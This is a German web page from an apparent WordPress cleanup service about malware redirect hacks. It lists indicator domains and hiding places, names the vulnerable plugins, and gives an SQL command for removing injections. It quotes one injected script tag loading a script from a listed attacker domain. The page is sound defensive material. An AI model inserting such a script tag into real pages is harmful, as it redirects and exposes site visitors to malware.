WordPress gehackt WeiterleitungBei vielen aktuellen WordPress Hacks kommt es zu dem Symptom, dass Aufrufe der Webseite auf eine fremde Domain weitergeleitet werden. Man spricht von "Malware Redirects" oder "Spam Weiterleitungen".
In diesem Artikel wird beleuchtet, wie es zu dieser Umleitung kommt und welche Variationen möglich sind. Denn nicht immer treten die Weiterleitungen regelmäßig auf, wodurch diese Art von Hack unter Umständen längere Zeit unerkannt bleibt.
Fest steht: Es muss dringend Abhilfe geschaffen werden, damit kein wertvoller Traffic verloren geht.

Wenn Sie keine Zeit verlieren möchten, zögern Sie nicht uns zu kontaktieren.

 

English flag  We speak English! If you need assistance cleaning your hacked site, feel free to contact us via chat or Diese E-Mail-Adresse ist vor Spambots geschützt! Zur Anzeige muss JavaScript eingeschaltet sein! .
 

Involvierte Domainnamen bei WordPress Hacks

Allen voran sind derzeit hauptsächlich stat.trackstatisticsss.com, dest.collectfasttracks.com, gotosecond2.com und forwardmytraffic.com als eingeschleuste Script-Quellen oder Weiterleitungsziele involviert. Die Inhalte dahinter sind sind vielfältig - von einfachen Spam-Seiten über XXX Angebote bis hin zu Gewinnspiel Umleitungen.
Sehr verbreitet: Sie haben die milliardste Google Suche getätigt - häufiges Symptom bei einem WordPress Hack.

Eine fortlaufend ergänzte Liste der Domains, die auf einen Hack hindeuten (Stand Mai 2020):

  • stat.trackstatisticsss.com
  • ws.stivenfernando.com
  • dest.collectfasttracks.com
  • gotosecond2.com
  • makesomethird3.com
  • wiilberedmodels.com
  • bullgoesdown.com
  • forwardmytraffic.com
  • dns.createrelativechanging.com
  • greatinstagrampage.com
  • gabriellalovecats.com
  • jackielovedogs.com
  • tomorrowwillbehotmaybe.com
  • activeandbanflip.com
  • developsincelock.com
  • blueeyeswebsite.com

WordPress Spam Weiterleitungen - mögliche Verstecke

Automatische Weiterleitungen können prinzipiell in jeder vom WordPress System geladenen Datei platziert worden sein - intern wie extern.
Daneben kommt es ebenfalls häufig zu Script Injektionen direkt in die Datenbank.
Es gibt diverse mögliche Verstecke für Spam Umleitungen:

  • Javascript Injektionen in PHP Dateien
  • Veränderte JS Dateien
  • Script Injektionen in Seiten und Beiträgen (Datenbank)
  • Script Injektionen in Widgets (Datenbank)
  • Modifizierte .htaccess Dateien
  • Eingebundene Werbenetzwerke (gehackte Adserver)

wp_content Tabelle per phpMyAdmin bereinigen

Eine typische Injektion, die sich in sämtlichen WordPress Posts wiederfinden kann, wäre zum Beispiel:

<script src="https://jackielovedogs.com/pret.js?l=1&" language="javascript" type="text/javascript"></script>

Mit folgenden SQL Befehl können Sie das Script entfernen:

UPDATE `wp_posts` SET post_content=REPLACE(post_content,"<script src="https://jackielovedogs.com/pret.js?l=1&" language="javascript" type="text/javascript"></script>","");

Das Datenbanktabellen-Präfix  wp_  muss gegebenenfalls durch Ihr individuelles Präfix ersetzt werden.

Hack Ursachenforschung - WordPress Sicherheitslücken schließen

Die Hauptursache für gehackte Webseiten sind veraltete Versionsstände. Sowohl WordPress selbst, als auch sämtliche Plugin und das Theme müssen regelmäßig aktualisiert werden.
Bei der aktuellen Malicious Redirect Kampagne werden folgende Plugins attackiert, die in älteren Versionen angreifbar sind:

  • Duplicator
  • Advanced Access Manager
  • Bold Page Builder
  • Blog Designer
  • Live Chat with Facebook Messenger
  • Yuzo Related Posts
  • Visual CSS Style Editor
  • WP Live Chat Support
  • Form Lightbox
  • Hybrid Composer
  • Woocommerce User Email Verification
  • Yellow Pencil Visual Theme Customizer
  • Coming Soon and Maintenance Mode
  • Alle NicDark plugins

Erfolgreich attackierte Plugins gehen aus unserem Access Log Analyse Tool hervor, das Sie gern für die weitere Untersuchung des Angriffs nutzen können. Ein gewisses technisches Verständnis wird vorausgesetzt. Bei Bedarf können wir die WordPress-Hack Bereinigung zum günstigen Festpreis für Sie übernehmen.

 

Kommentare  
Chris
# Chris 2020-03-18 14:15
Danke für den Post. Hat mir geholfen. Wie kann ich diese Malware künftig verhindern? Ich habe keines der genannten Plugins benutzt!
Antworten
Pascal
# Pascal 2020-03-18 14:39
Die Liste ist nicht vollständig - die letzten Monate gab es diverse Plugin-Sicherheitslücken.
Manchmal sind auch einfach unsicher gewählte Admin Passwörter die Ursache. Ich würde empfehlen den Admin Login umzubenennen (per "WPS Hide Login" z.B.) und die xmlrpc Schnittstelle per .htaccess zu blockieren. Damit sind klassische Bruteforce Angriffe, welche überwiegend auf /wp-admin, wp-login.php und xmlrpc.php gefeuert werden, unterbunden.
Auch eine Firewall Lösung wie die NinjaFirewall kann Sinn machen, um die WordPress Sicherheit zu erhöhen.
Antworten
Aurelius
# Aurelius 2020-04-05 14:33
Auch ich bedanke mich und im Namen unseres Fanclubs. Super Support und tolle, hilfreiche Dokumentation! War zwar ne Menge Arbeit, aber besser, als alles wieder von vorne einzurichten. TOP.
Antworten

Ergänzende Angebote

Kunden über uns

„Umstellung unserer Joomla Website von PHP 5.3 auf PHP 7 lief super schnell, günstig und mit tadellosem Ergebnis. Sehr gute und nette Kommunikation.“
– H. Bergmann

„Innerhalb eines Tages wurde alles extrem professionell und extrem schnell gemacht. Sehr vertrauenswürdig. Excellent. 5 Sterne“
– Fernando V.

„Ich selbst wusste mir nicht zu helfen, fand hier aber die nötige Kompetenz, um alles wieder bereinigen zu lassen. Nötige Updates und Sicherungen wurden gemacht, alles äußerst preiswert, schnell und gut!“
– Klaus-Peter

„Die Seite sieht super aus – alles wie zuvor – und das unter PHP 7.2 – ich bin beeindruckt - ganz herzlichen Dank!“
– Dr. Ingo Wuddel

„Da wir einen Onlineshop betreiben war es für uns sehr wichtig, dass unsere Seite schnell wieder im vollen Funktionsumfang für unsere Kunden zur Verfügung steht. Alle Arbeiten wurden äußerst schnell zu unserer vollen Zufriedenheit ausgeführt.“  – Löwen Handels GmbH

„Sehr schnelle, seriöse und zielführende Bearbeitung des Problems. Zusätzlich wurden mir Tipps und Strato spezifische Infos mitgegeben, um das Risiko eines Wiederkehrens des Problems zu verringern.“
– Heino B.

„Der Kontakt war besonders freundlich, einige kosmetische Zusatzarbeiten wurden - als sei es selbstverständlich - von selbst in Angriff genommen. Ich bin erleichtert und sehr dankbar.“
– R. Mayer

„Super. In einer absoluten Notlage bei Sperrung von 2 Domains durch Strato wegen Hackerangriff wurden beide Domains zunächst temporär noch am gleichen Tag wieder live geschaltet.“
– I. Radchenko

„Hervorragender Service. Problem innerhalb von 18 Stunden gelöst. Wir sind begeistert. Vielen Dank 🙏“
– Tien Sy Vuong

Website-Bereinigung.de Support Service Google Bewertungen

Kontaktmöglichkeiten

Chat starten (online)
Diese E-Mail-Adresse ist vor Spambots geschützt! Zur Anzeige muss JavaScript eingeschaltet sein!
Kontaktformular

Telefonat vereinbaren
+49 (0)2406 969796
Mo. - Fr. | 9 - 18 Uhr